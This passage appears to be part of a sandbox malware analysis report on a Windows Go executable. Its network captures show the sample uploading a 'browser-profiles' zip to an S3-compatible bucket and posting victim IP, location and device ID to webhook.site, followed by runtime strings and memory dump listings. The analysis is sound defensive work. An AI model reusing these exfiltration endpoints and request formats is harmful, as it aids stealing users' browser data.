1f 60 f6 55 7a 69 24 49 2f 8b 84 8c bd Data Ascii: <3O!m+0W7*n?h3?\zy8:0pBjQ8B ~jyf6L6np]E<X^88eSgpojQ80GBBb(J)WGO5\`K?8%iZ8$cH^AJ?#mk@q6\0rXPCj.t=AJ`Uzi$I/
2024-08-30 01:26:15 UTC	7116	OUT	Data Raw: 33 2b 3d a2 5f 87 a1 4a e0 be 95 e9 95 82 30 dd 4d e8 cc 53 88 d3 5c e4 b8 e2 2d 5c 70 2b b9 d8 f5 66 f9 53 e8 6c 47 6e c8 c9 d4 b2 30 74 e6 85 30 39 a8 33 9f fb 9c 80 cb f0 25 84 4a 54 f6 03 85 80 2d 3f 8c a6 e4 2c a4 e6 03 3f a4 b3 2a c7 e8 4c 37 d0 99 55 5e e0 70 09 c0 e4 9b c1 f3 9c 27 7c df 54 85 f7 1d be ff f4 ab af 47 d1 27 92 ab 2a 4e dd cb d7 5c 49 4a 61 18 75 16 84 52 a7 bc 36 9a 1f 4a 45 ff 8f 8a a6 c8 e5 f9 21 ac 8c 3a 7d c7 43 21 a5 20 0c 9c 05 11 90 92 b7 14 82 5f 7b 13 66 ba 10 b9 6f a8 8a d0 99 d5 84 ce 72 cb a0 94 cb 5b 29 90 d9 8d 88 33 2a bd d9 a2 28 37 8c f3 bf 28 f8 7d 6e cf 09 f9 61 6a 09 df 8b 25 f0 f6 0b c3 44 5f 51 41 18 3a 0b 43 b9 9f 2a 45 f2 5f a5 c8 c7 0a c3 b8 0f c7 91 1f 8a 76 ee b3 0a e1 70 16 84 d0 d4 7c 15 26 96 a7 d1 f9 Data Ascii: 3+=_J0MS\-\p+fSlGn0t093%JT-?,?L7U^p'\|TG'N\IJauR6JE!:}C! _{for[)3(7(}naj%D_QA:CE_vp\|&
2024-08-30 01:26:15 UTC	8302	OUT	Data Raw: 96 13 0c 36 a6 9f 08 6a 95 79 b9 2f 72 64 1a 0a ce 5d b3 41 7d f8 51 b8 c3 85 38 b5 72 0c a6 54 0a 12 08 e5 b4 8a f1 5e 98 52 21 90 29 ac 2f 5c 80 53 4e 23 4e a9 a6 6d 93 5d f4 3f 7c b2 fd 4f 5f 0b 92 ee 89 7b 82 63 ec f9 2a 37 d7 3b 4f 85 b6 1c 95 57 d4 59 8c 55 e1 d3 db 9f f7 eb 0b 46 ad b9 e3 bc 88 40 98 ff e6 07 30 d9 8d 30 ad 72 0c c4 fd 6e 02 4c ad f4 c2 d4 4a c1 97 9f c2 79 c2 fb 61 aa 1b 79 ec fb 29 35 70 72 d2 5b d2 37 fa ff 64 7c 90 af 48 be f8 9a d6 3d c1 f7 3a 0a 42 86 53 4a 42 d0 96 ab f2 da 73 95 c4 9e ab 02 fb 84 18 1d 1c 54 8e d7 61 93 62 78 88 54 25 9d a7 a4 32 b5 e5 86 82 33 7b 1e 98 ca ff 0f 4c a9 46 3a bd d2 0b d3 aa 04 3a 4d 8e e1 51 45 24 5e a4 ac 3f 44 4a c8 d4 4a c1 cb ff 1f 61 0d 1d f6 c5 ff ff c7 62 e5 7e 55 f2 d5 63 cf 0b d9 95 Data Ascii: 6jy/rd]A}Q8rT^R!)/\SN#Nm]?\|O_{c*7;OWYUF@00rnLJyay)5pr[7d\|H=:BSJBsTabxT%23{LF::MQE$^?DJJab~Uc
2024-08-30 01:26:15 UTC	746	OUT	Data Raw: 5c d3 70 8e e1 0c 33 9a 0d a2 72 de c5 e6 b7 53 7e c1 cb 0c 99 f3 4e e7 a7 c9 d0 f2 06 f2 fe 69 0d 51 c2 38 98 7e 08 e8 34 79 7d fa a7 e6 40 5c 63 fa ab 92 83 25 9b d2 2e 15 6f 64 f8 a4 9a 32 ef 9b c8 6f 46 38 3e 3c 07 5e d8 96 17 2e 45 cb 9f 97 22 d6 19 07 22 5f 9e c2 4f e6 8a 53 f8 8e c2 d6 ca cb 28 e6 22 07 63 73 1e aa c9 80 a5 15 b3 49 f6 63 0f 63 ce bd 99 8d c3 20 34 a3 ad ba 51 72 61 5a 6d 99 77 4f 1f 17 f9 f7 90 9b 66 62 f1 c3 b9 31 67 ec 07 73 fa 41 b8 34 4d 9e 93 ff 74 d7 a6 78 6f 55 54 9e 98 5a 52 97 d6 55 52 87 1a d9 a6 9e 57 4e cf c7 37 56 fe bd 70 6c ae 3e 85 33 e7 29 96 ab f0 a8 fc 87 29 8a d3 70 b5 36 bf 3a 66 5b c1 bf e4 99 f7 25 43 b8 26 93 cc f9 c5 5b 30 bd 05 40 e5 3d 6c 36 c9 a8 fc 7e 57 c8 fd a7 b8 68 b6 fb 8e 6d ac c1 30 67 1c 20 74 Data Ascii: \p3rS~NiQ8~4y}@\c%.od2oF8><^.E""_OS("csIcc 4QraZmwOfb1gsA4MtxoUTZRURWN7Vpl>3))p6:f[%C&[0@=l6~Whm0g t
2024-08-30 01:26:15 UTC	10674	OUT	Data Raw: e5 c7 36 d6 98 c4 85 63 c3 f1 c2 5c a2 c8 01 f6 29 6c e4 7e f4 9c ac 0a 67 cc 9f 8a 5a fc b0 b4 2e 0b 4a 6b 33 08 cf d5 9b 42 42 98 63 35 19 73 ae 32 3b 2f c1 9c a4 59 38 97 cd d3 fd 0d 3f b3 26 11 82 9b e7 93 1b 1a 7a 18 76 30 bb 39 0a 63 e4 19 45 5e 46 b7 91 1f 2b 07 a9 de df 64 da f2 d8 ce c6 9c ad 66 74 f6 71 4a af 69 30 f7 70 4c df a3 0f c8 b8 53 93 5a bc 74 4b 06 2d ad cd 40 ec 4b 45 1e d6 92 ba 74 28 ae e3 98 ea 79 49 11 b7 5a 7b ae 52 c4 b3 4e e3 ca 36 ce 71 2f 91 98 0b dc d5 e7 08 2c d9 b8 bf 3a 01 73 bc ce 2f bb 8e 14 55 c5 13 d6 bf f2 91 7c 58 b3 d5 8d 65 e5 23 0e 58 b6 29 93 04 aa 12 70 ce c2 f2 39 e0 af 8a c7 7d f1 7d 64 f0 d8 58 9b 05 4b ab af 07 e7 e3 df 42 1f b8 ae 69 18 54 8e 53 86 25 e6 7f 35 ac 9c a7 4d 51 aa fa 9a 0c 7a ed 18 f9 60 15 Data Ascii: 6c\)l~gZ.Jk3BBc5s2;/Y8?&zv09cE^F+dftqJi0pLSZtK-@KEt(yIZ{RN6q/,:s/U\|Xe#X)p9}}dXKBiTS%5MQz`
2024-08-30 01:26:15 UTC	11860	OUT	Data Raw: f3 eb 24 1a 28 4f a4 8c 5b 7f 59 e2 48 a0 8c f1 9d 40 44 81 40 79 22 a0 1d c8 7a 03 e7 3d b0 81 af 17 95 25 42 60 c3 8d b0 b0 ca 03 53 9f 6d 87 f1 8d 26 4c a8 1f 81 09 f5 06 4c 68 b0 15 32 be 5e d9 05 b3 89 91 f1 0d 86 39 a1 c1 c4 58 31 e1 08 a5 13 9a 58 9c 30 da c7 37 92 47 ae 6e a6 ab e3 aa de 98 a8 8e 87 d9 c0 df cf 0f ef be c4 f8 fa 92 b2 1b f3 02 e5 09 df f4 97 25 fc 8e f9 78 b8 36 09 e3 38 e3 31 b0 01 f9 36 19 d7 c8 73 79 02 2f 31 fc 2b 1b 28 e3 73 ac 75 3e a7 a8 3c 85 b0 18 90 b5 fb 1e b8 ba 89 d2 89 8c ff 06 03 26 8a 22 6d 00 db ca 2e 4c 32 a1 3e 0a e3 eb 4d 32 a1 81 d9 83 39 82 63 cd c2 16 98 4d 34 c2 af c6 3d 37 f2 d5 b8 5f 8c 64 db 8e f1 ef 76 30 7a b1 9f d7 af 0a 54 25 2c 0d 56 26 3e 19 a8 48 1c 61 7e ce b8 0f 94 27 12 16 cb 03 65 89 c4 5f ce Data Ascii: $(O[YH@D@y"z=%B`Sm&LLh2^9X1X07Gn%x6816sy/1+(su><&"m.L2>M29cM4=7_dv0zT%,V&>Ha~'e_
2024-08-30 01:26:15 UTC	10234	OUT	Data Raw: f6 f9 0f 49 cc fd e1 95 06 08 fd 72 38 be 00 60 dc 7d b3 25 82 3f 6e fb b0 3a e7 84 62 78 8c c7 0b be 9e e9 86 6f 96 84 7c e8 1a b2 9f aa 1b 8c 53 39 54 03 7c b2 65 c9 ef 0c 42 de d9 60 56 fc 0e fd b8 91 3b cd 1c 63 40 4a 8e 37 a9 9b 14 0e 60 4e 24 ec 60 fa 90 6a 02 9c 2b 7c 5e 7c 8a 15 8e fa 74 00 0c 7d 6b 01 d4 59 2b a0 61 f0 75 05 6f ec ef ee 75 8c 7d 2f fd 75 98 b2 fb 36 49 88 65 f6 55 4f f1 f3 5f e4 bd 98 44 9b f0 1a 0b 3c 10 b0 14 b1 73 9f a3 8e 73 5c 39 e6 02 c6 ee 98 2b f3 58 3d a9 f5 7e ed 3a 75 7f d2 9e 6f 46 52 c1 59 e5 f3 5f 84 06 2c f6 6f 29 01 e4 fb 1a fa 5c 19 f8 e5 50 0d f0 e3 1c c8 55 f0 06 c4 f7 39 f6 78 8c f2 82 f5 61 de 30 ee 60 0e b1 d8 e1 9b c3 4b 85 27 6c be a4 c6 97 5c 08 bd b3 e4 b1 b1 bb 0c fa 91 a9 96 c6 84 9d 16 84 f1 4c 48 c5 Data Ascii: Ir8`}%?n:bxo\|S9T\|eB`V;c@J7`N$`j+\|^\|t}kY+auou}/u6IeUO_D<ss\9+X=~:uoFRY_,o)\PU9xa0`K'l\LH
2024-08-30 01:26:17 UTC	421	IN	HTTP/1.1 200 OK Connection: close Date: Fri, 30 Aug 2024 01:26:17 GMT ETag: "786aef69d726b92b7a8e87d4a5f0aedb" Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (head4) x-amz-id-2: kXYxD9oX2p5jtMkW8up+iPHsTdczT7gGlxpgDKBi5qUxpS+6wgqDvfzQYsiU/JXYzreyAH67t8hx x-amz-request-id: 3B794F8415CA99E7:A x-wasabi-cm-reference-id: 1724981175207 154.18.200.103 ConID:387951515/EngineConID:3758938/Core:9 Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	154.18.200.103	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:18 UTC	734	OUT	POST /browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploadId=xegBsN0h7GK8TsbYHtXU_rFF4rPC2_2LH9Yu8_BPdoDoOFvXyLT4HBqv_zXSu7-SihvUH-HBZN3kGSnHfVKG4JBLZ0rDdIuUMtS9KUOhMcJseIl8xj753Ke9waxkTXK2 HTTP/1.1 Host: s3.ap-southeast-1.wasabisys.com User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386) Content-Length: 193 Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240830/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;host;x-amz-content-sha256;x-amz-date, Signature=dba20c7bc49eb2f8773074c9bbbc49ad1d78ada837397a2dbb35aaae97d3b2fb X-Amz-Content-Sha256: 12db02ea1b539fa646f5af6a6c13d2fe966a44e3eb9b25fd37261a920a30c9d2 X-Amz-Date: 20240830T012616Z Accept-Encoding: gzip
2024-08-30 01:26:18 UTC	193	OUT	Data Raw: 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 50 61 72 74 3e 3c 50 61 72 74 4e 75 6d 62 65 72 3e 31 3c 2f 50 61 72 74 4e 75 6d 62 65 72 3e 3c 45 54 61 67 3e 26 23 33 34 3b 37 38 36 61 65 66 36 39 64 37 32 36 62 39 32 62 37 61 38 65 38 37 64 34 61 35 66 30 61 65 64 62 26 23 33 34 3b 3c 2f 45 54 61 67 3e 3c 2f 50 61 72 74 3e 3c 2f 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 3e Data Ascii: <CompleteMultipartUpload xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Part><PartNumber>1</PartNumber><ETag>"786aef69d726b92b7a8e87d4a5f0aedb"</ETag></Part></CompleteMultipartUpload>
2024-08-30 01:26:19 UTC	423	IN	HTTP/1.1 200 OK Connection: close Content-Type: application/xml Date: Fri, 30 Aug 2024 01:26:18 GMT Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (R107-U12) x-amz-id-2: e434y5Y1yI4+UyMjjiYNxEK09N35b41OcQFVgTfirKLs9gz3MzfLDhA2aKvhAtNsP8Dn+KQUeAzZ x-amz-request-id: E4AE2C7DA4B885E0:B x-wasabi-cm-reference-id: 1724981177962 154.18.200.103 ConID:387952405/EngineConID:3756203/Core:63 Transfer-Encoding: chunked
2024-08-30 01:26:19 UTC	453	IN	Data Raw: 31 62 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 4c 6f 63 61 74 69 6f 6e 3e 68 74 74 70 73 3a 2f 2f 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 2f 32 30 32 34 30 38 32 39 32 31 32 36 31 31 2d 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 3c 2f 4c 6f 63 61 74 69 6f 6e Data Ascii: 1b9<?xml version="1.0" encoding="UTF-8"?><CompleteMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Location>https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip</Location

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49742	46.4.105.116	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:19 UTC	183	OUT	POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1 Host: webhook.site User-Agent: Go-http-client/1.1 Content-Length: 519 Content-Type: application/json Accept-Encoding: gzip
2024-08-30 01:26:19 UTC	519	OUT	Data Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 32 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 64 61 74 65 74 69 6d 65 5f 75 74 63 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 31 3a 32 36 3a 31 37 2e 38 34 37 30 38 34 38 5a 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 22 2c 22 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 69 73 70 5f 6f 72 67 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 37 38 2c 22 6c 6f 6e 67 69 74 75 64 65 22 Data Ascii: {"campaign_id":"ADTY0002","city":"New York City","country":"US","datetime_utc":"2024-08-30T01:26:17.8470848Z","device_id":"71434D56-1548-ED3D-AEE6-C75AECD93BF0","error_message":"","ip_address":"8.46.123.33","isp_org":"LEVEL3","latitude":40.778,"longitude"
2024-08-30 01:26:21 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 4a42ac35-5a32-4828-be89-ca3614eed29e X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5 Cache-Control: no-cache, private Date: Fri, 30 Aug 2024 01:26:21 GMT
2024-08-30 01:26:21 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	46.4.105.116	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:23 UTC	183	OUT	POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1 Host: webhook.site User-Agent: Go-http-client/1.1 Content-Length: 510 Content-Type: application/json Accept-Encoding: gzip
2024-08-30 01:26:23 UTC	510	OUT	Data Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 32 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 64 61 74 65 74 69 6d 65 5f 75 74 63 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 31 3a 32 36 3a 32 31 2e 34 30 35 31 33 39 38 5a 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 22 2c 22 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 69 73 70 5f 6f 72 67 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 37 38 2c 22 6c 6f 6e 67 69 74 75 64 65 22 Data Ascii: {"campaign_id":"ADTY0002","city":"New York City","country":"US","datetime_utc":"2024-08-30T01:26:21.4051398Z","device_id":"71434D56-1548-ED3D-AEE6-C75AECD93BF0","error_message":"","ip_address":"8.46.123.33","isp_org":"LEVEL3","latitude":40.778,"longitude"
2024-08-30 01:26:25 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 05ff391e-1699-4089-892e-dc454b048236 X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5 Cache-Control: no-cache, private Date: Fri, 30 Aug 2024 01:26:25 GMT
2024-08-30 01:26:25 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0

Target ID:	0
Start time:	21:26:00
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\5EvHHcMjRg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5EvHHcMjRg.exe"
Imagebase:	0xae0000
File size:	16'819'200 bytes
MD5 hash:	1C6B522D985B2E60890A098E3D5E78B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00AF3320 Relevance: 9.0, Strings: 7, Instructions: 250COMMON

Download Yara Rule

Strings

with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runti, xrefs: 00AF346B
), xrefs: 00AF356A
runtime: typeBitsBulkBarrier with type bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn, xrefs: 00AF3441, 00AF34C3
runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:, xrefs: 00AF3486, 00AF354B
of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64, xrefs: 00AF34ED
but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked, xrefs: 00AF3517
runtime: typeBitsBulkBarrier without type/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpan, xrefs: 00AF3561

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked$ of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64$ with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runti$)$runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:$runtime: typeBitsBulkBarrier with type bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn$runtime: typeBitsBulkBarrier without type/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpan
API String ID: 0-444383925
Opcode ID: 821edbbc9af874eb79d556e9a0aa7a54f95189a9c114518c9d6f8033ca289d13
Instruction ID: a65f01e019fb0505c4e384e3a549eda1eaaef5fe19a0bc61bf6d3d7239ad4508
Opcode Fuzzy Hash: 821edbbc9af874eb79d556e9a0aa7a54f95189a9c114518c9d6f8033ca289d13
Instruction Fuzzy Hash: 3EA159B69097088FC700EF58C48066AFBE1BFC8714F45896DE99887312D774EA45DB93

Function 00AF3F7B Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 00B0F975
@, xrefs: 00B0F85E

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
